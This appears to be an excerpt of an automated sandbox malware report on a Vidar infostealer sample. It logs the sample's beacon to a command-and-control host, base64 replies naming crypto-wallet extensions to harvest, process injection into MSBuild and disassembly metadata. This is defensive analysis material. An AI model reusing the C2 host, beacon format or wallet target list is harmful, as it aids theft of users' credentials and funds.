Oct 7, 2024 18:46:35.931319952 CEST	522	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH Host: lade.petperfectcare.com Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"21------KFHJJDHJEGHJKECBGCFH--
Oct 7, 2024 18:46:35.936810017 CEST	224	IN	Data Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF
Oct 7, 2024 18:46:35.936852932 CEST	1236	IN	Data Raw: 38 4d 48 77 77 66 45 56 57 52 56 49 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 64 6c 5a 57 39 6b 63 47 5a 68 5a 32 70 6a 5a 57 56 6d 61 57 56 6d 62 47 31 6b 5a 6e 42 6f 63 47 78 72 5a 57 35 73 5a 6d 74 38 4d 58 77 77 66 44 42 38 53 32 46 79 5a Data Ascii: 8MHwwfEVWRVIgV2FsbGV0fDF8Y2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8MXwwfDB8S2FyZGlhQ2hhaW58MXxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXwxfGFjbWFjb2RramJkZ21vbGVlYm9sbWRqb25pbGtkYmNofDF8MHwwfFBoYW50b218MXxiZm5hZWxtb21laW1obH
Oct 7, 2024 18:46:35.936862946 CEST	1236	IN	Data Raw: 6c 63 48 42 6e 5a 48 42 6f 66 44 46 38 4d 48 77 77 66 45 56 34 62 32 52 31 63 79 42 58 5a 57 49 7a 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6f 62 32 78 77 5a 6d 52 70 59 57 78 71 5a 32 70 6d 61 47 39 74 61 57 68 72 61 6d 4a 74 5a 32 70 70 5a Data Ascii: lcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW1lamRtYXwxfDB8MHxFbmtyeXB0fDF8a2twbGxrb2RqZWxvaWRpZWVkb2pvZ2FjZmhwYWlob2h8MXwwfDB8T0tYIFdlYjMgV2
Oct 7, 2024 18:46:36.578031063 CEST	282	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Oct 7, 2024 18:47:11.725433111 CEST	13.107.246.45	443	192.168.2.4	49769	CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013	Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
					CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jun 08 02:00:00 CEST 2023	Wed Aug 26 01:59:59 CEST 2026
					CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 01 14:00:00 CEST 2013	Fri Jan 15 13:00:00 CET 2038

Target ID:	0
Start time:	12:46:08
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\lCVFGKfczi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lCVFGKfczi.exe"
Imagebase:	0xdc0000
File size:	584'704 bytes
MD5 hash:	B84100C670BB19E92BFB62423048AA43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:46:09
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x240000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:46:09
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x210000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:46:09
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xbb0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:46:09
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
Imagebase:	0x360000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:46:36
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428
Imagebase:	0x360000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.1%
Total number of Nodes:	229
Total number of Limit Nodes:	4

Executed Functions

Function 00DC2021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00E4DCD8,?,00000040,?), ref: 00DC2738

Strings

', xrefs: 00DC2718
a, xrefs: 00DC2296
S, xrefs: 00DC206A

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: '$S$a
API String ID: 544645111-1060379873
Opcode ID: 8e07eca4ab498d7688db5e738af865ea92c31744332cf77bed8d5a3861286eef
Instruction ID: c21d703ca0ec9edd84199f7b357ca3648140ff3e8ab427eccf1266583cd455d0
Opcode Fuzzy Hash: 8e07eca4ab498d7688db5e738af865ea92c31744332cf77bed8d5a3861286eef
Instruction Fuzzy Hash: 4FF1E127934E1B06E708603D8C927F6958AD7EA330F95433BBE63DB3F4E36949419254

Function 00DD8E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00DD8FDD

Part of subcall function 00DD3A83: HeapAlloc.KERNEL32(00000000,00DDA1AA,?,?,00DDA1AA,00000220,?,?,?), ref: 00DD3AB5

__freea.LIBCMT ref: 00DD8FF2
__freea.LIBCMT ref: 00DD9002

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: af8cef6d3c6a27e0205cbee9028abb65b49bde2c0e983756f4a1662dca34bcd8
Instruction ID: 8f1d0a8d7741c9c68bf24d2470be444451da512bb0b7ab36fc58dc8237d89a94
Opcode Fuzzy Hash: af8cef6d3c6a27e0205cbee9028abb65b49bde2c0e983756f4a1662dca34bcd8
Instruction Fuzzy Hash: 89518372600216AFEB225FA4CC41EBB7BAAEF44750B19052AFD08D6350EF31CD54A770

Function 00DDA3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD9ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00DD9F01

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00DDA1ED,?,00000000,?,?,?), ref: 00DDA407
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDA1ED,?,00000000,?,?,?), ref: 00DDA449

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 93cc7004bddc39f188d19a48ac52c6e0885d95fb534243614d8dad2d3704e463
Instruction ID: 4f7a583f1eb2b47e7dffdb3fc6f2c19954b54307cde773bc28622d32fd162068
Opcode Fuzzy Hash: 93cc7004bddc39f188d19a48ac52c6e0885d95fb534243614d8dad2d3704e463
Instruction Fuzzy Hash: 2A512271A002859FDB20DF79C884AAAFBF5EF81304F18846FD0868B351E6B5D945CB72

Function 00DD6368 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00DD8F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00DD639C
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00DD8F1C,?,?,00000000,?,00000000), ref: 00DD63BA

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: c3c1653702c43c9bbc9f7f63a2b73b170491d48ab858d5ec63c336b796549ea4
Instruction ID: 5ce91c2bccd66c5dfa019be91accafa4ecf74de76e5c3ccbdc2b217615c1576d
Opcode Fuzzy Hash: c3c1653702c43c9bbc9f7f63a2b73b170491d48ab858d5ec63c336b796549ea4
Instruction Fuzzy Hash: 1FF04D3240025ABBCF126F90DC09DEE3F66EF48764F098115FA186A230C736D975EBA5

Function 00DD9FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00DDA1F9,00DDA1ED,00000000), ref: 00DD9FDC

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 90c937e47fcc1ded079897bbfd101fa4e95d3755af417e4e5c58d4a4a8e4f168
Instruction ID: 2a15e75542c585256e7cfb6a5057e7a394c50c1b30a7e307c5a8cd9e7a5a4349
Opcode Fuzzy Hash: 90c937e47fcc1ded079897bbfd101fa4e95d3755af417e4e5c58d4a4a8e4f168
Instruction Fuzzy Hash: 385159719042589ADB218E2CCD80FF67BB8EB45304F2445EEE19AC7286C275AD46DB31

Non-executed Functions

Function 00DDD39B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00DDD57F

Strings

1#QNAN, xrefs: 00DDD4AE
1#INF, xrefs: 00DDD4D1
1#IND, xrefs: 00DDD4A0
1#SNAN, xrefs: 00DDD4A7

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5870bacb501339821e66612c2e938afd028faafdd217be7c49bf635b2594babf
Instruction ID: dd9a05b1b57319e7d360c5b23f25459cf4a74c3bdf390167acf96063a5b4cd17
Opcode Fuzzy Hash: 5870bacb501339821e66612c2e938afd028faafdd217be7c49bf635b2594babf
Instruction Fuzzy Hash: 17D22771E082298FDF65DE28DD407EAB7B6EB84305F1841EAD44DE7240E774AE818F61

Function 00DDC814 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00DDCB32,00000002,00000000,?,?,?,00DDCB32,?,00000000), ref: 00DDC8AD
GetLocaleInfoW.KERNEL32(?,20001004,00DDCB32,00000002,00000000,?,?,?,00DDCB32,?,00000000), ref: 00DDC8D6
GetACP.KERNEL32(?,?,00DDCB32,?,00000000), ref: 00DDC8EB

Strings

OCP, xrefs: 00DDC868
ACP, xrefs: 00DDC832

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fce36369ab361fe1bbf29ca39567a7da66b8a33c30ad34208eeda245e24d39b4
Instruction ID: e8ff96fbad5d8dcc89d7b78c836bbd51c76d0c7c1976b7000cb48804731d078e
Opcode Fuzzy Hash: fce36369ab361fe1bbf29ca39567a7da66b8a33c30ad34208eeda245e24d39b4
Instruction Fuzzy Hash: 7E21A432A20203E6DB249F55C941E9777A6BF54F50F5A9426E909DB300EB32DD40E370

Function 00DDC9E9 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00DDCAF5
IsValidCodePage.KERNEL32(00000000), ref: 00DDCB3E
IsValidLocale.KERNEL32(?,00000001), ref: 00DDCB4D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DDCB95
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DDCBB4

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 2003dc154ee17037da2f40d4ffbd896a66d99a3faf05ec623c8cd57465a9c715
Instruction ID: fd886f039e2cf51f74d9bb374f0695819ea0e2aa4b10e4176360c32f297ea8a1
Opcode Fuzzy Hash: 2003dc154ee17037da2f40d4ffbd896a66d99a3faf05ec623c8cd57465a9c715
Instruction Fuzzy Hash: 96516F71A1020AABDB10EFA5CC45ABA77B8FF09700F19546BE911EB390E770DA05CB71

Function 00DDC085 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DD4EB1: GetLastError.KERNEL32(?,00000008,00DD9482), ref: 00DD4EB5
Part of subcall function 00DD4EB1: SetLastError.KERNEL32(00000000,00DEC480,00000024,00DD0419), ref: 00DD4F57

GetACP.KERNEL32(?,?,?,?,?,?,00DD1848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DDC146
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00DD1848,?,?,?,00000055,?,-00000050,?,?), ref: 00DDC171
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00DDC2D4

Strings

utf8, xrefs: 00DDC243

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: ca9ec06cdab6470dd7eaa86bcb84dc4f9546127c044b0cc1cc93593573018888
Instruction ID: 55ed5dcc7470255a48508ff12da61942fdae37adfa6226384fc3519a8682e51e
Opcode Fuzzy Hash: ca9ec06cdab6470dd7eaa86bcb84dc4f9546127c044b0cc1cc93593573018888
Instruction Fuzzy Hash: 1E71D231A60313AADB24BBB5CC46BBAB7A8EF44750F18502BF505D7381EA70E941C7B4

Function 00DD3C92 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00DD3D1F

Memory Dump Source

Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
